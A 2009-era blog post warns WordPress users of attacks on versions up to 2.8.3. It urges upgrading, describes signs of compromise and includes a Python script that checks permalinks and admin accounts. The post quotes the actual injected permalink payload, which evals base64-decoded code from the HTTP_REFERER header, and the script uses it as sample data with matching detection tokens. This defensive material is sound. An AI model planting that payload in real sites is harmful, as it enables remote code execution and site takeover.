All WordPress blogs up to version 2.8.3 are reportedly being attacked and hacked.
The latest WordPress version 2.8.4 seems to be SAFE.
The blogs on WordPress.com are SAFE as the WordPress.com system is up-to-date.
Thank you so much to Lorelle on WP for making a post about this, which is how I got the news (check Lorelle's post for all the info).
Update to the Latest WordPress Version
Here's what you need to do if you have blog(s) that are not updated to the latest WordPress version:
- Before you continue reading,
- Go and update ALL YOUR WORDPRESS BLOGS to version 2.8.4.
- Really, stop reading, it IS that serious.
- Continue reading after you have UPGRADED your WordPress to the latest version.
Recognizing The Attack
Two clues have been recognized to spot if you've already been hacked (here's hoping you haven't been):
- A new, hidden administrator: the attack creates a “back door” in the form of a “hidden” Administrator account. Check your site users for “Administrator (2)” or a name you do not recognize. You will probably be unable to access that account, but Journey Etc. has a possible solution.
- Modified permalinks (Settings --> Permalinks): the keywords to look for are “eval” and “base64_decode”, as in this example:
  example.com/category/post-title/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_REFERER%5D))%7D%7D|.+)&%/
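Here is a small check that automates the two clues above. It is an added example, not code from the original post or from WordPress: it URL-decodes a permalink structure (the injected code shows up percent-encoded, as in the example link) and looks for the “eval” / “base64_decode” keywords, and it compares the administrator accounts against a list of admins you know you created. The sample permalinks and user list are constructed for the demonstration; in practice you would paste in the value from Settings --> Permalinks (or the permalink_structure option) and your Users list.

```python
from urllib.parse import unquote

# Tokens that should never appear in a legitimate permalink structure.
SUSPICIOUS_TOKENS = ("eval(", "base64_decode(", "$_SERVER", "HTTP_REFERER")


def permalink_indicators(structure):
    """Return the suspicious tokens found in a permalink structure.

    The structure is URL-decoded first, because the injected code seen in
    this attack is stored percent-encoded (%7B for '{', %5B for '[', ...).
    """
    decoded = unquote(structure)
    return [token for token in SUSPICIOUS_TOKENS if token in decoded]


def unexpected_admins(users, known_admins):
    """Return administrator logins that are not on the list you recognise.

    `users` is an iterable of (login, role) pairs, as you would copy them
    from the Users screen; comparison is case-insensitive.
    """
    known = {name.lower() for name in known_admins}
    return sorted(login for login, role in users
                  if role == "administrator" and login.lower() not in known)


# Constructed sample data: one clean structure, and the injected one from
# the example above.
SAMPLE_PERMALINKS = {
    "clean": "/%category%/%postname%/",
    "injected": "/%category%/%postname%/%&(%7B$%7Beval(base64_decode("
                "$_SERVER%5BHTTP_REFERER%5D))%7D%7D|.+)&%/",
}
SAMPLE_USERS = [("alice", "administrator"),
                ("Administrator (2)", "administrator"),
                ("bob", "editor")]


def audit(permalinks=SAMPLE_PERMALINKS, users=SAMPLE_USERS,
          known_admins=("alice",)):
    """Run both checks and return a dict of findings (empty means clean)."""
    findings = {}
    for name, structure in permalinks.items():
        hits = permalink_indicators(structure)
        if hits:
            findings["permalink:" + name] = hits
    extra = unexpected_admins(users, known_admins)
    if extra:
        findings["unknown_admins"] = extra
    return findings


if __name__ == "__main__":
    for key, value in audit().items():
        print(key, value)
```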
Secure Your Blog
- WordPress Codex – FAQ – My Site Was Hacked
- WordPress Codex – Hardening WordPress (security protection)
- Weblog Tools Collection – Maximum WordPress Security
- Guvnr – 10 Tips to Make WordPress Hack Proof
- Daily Blog Tips – Make Sure Your WordPress is Not Hacked
- Noupe – WordPress Security Tips and Hacks
- 9 Best WordPress Security Plugins
- Top 5 WordPress Security Tips You Most Likely Don’t Follow
- WordPress Security Tip: Remove the Admin User
The News Updates
2009-09-04: News reported on the WordPress.org Support Forums: HACK WARNING: UPGRADE IMMEDIATELY:
if you don't upgrade, you will get hacked. It's not a matter of "if", it's a matter of "when". Don't wait to be hacked.
2009-09-05: WordPress development blog: How to Keep WordPress Secure
Spread the News!
We need to make sure everyone is informed about this. But stick to the facts, which at the moment are:
- Old WordPress blogs up to 2.8.3 are reportedly being attacked
- WP version 2.8.4 seems to be safe
Re-Tweet to make sure EVERY WordPress blogger is aware of this.
And always, always keep your WordPress and plugins in your blog updated to the latest version!
Read all about this here: Old WordPress Versions Under Attack via Lorelle on WP
Original Warning / News on the WordPress.org Forum: HACK WARNING: UPGRADE IMMEDIATELY
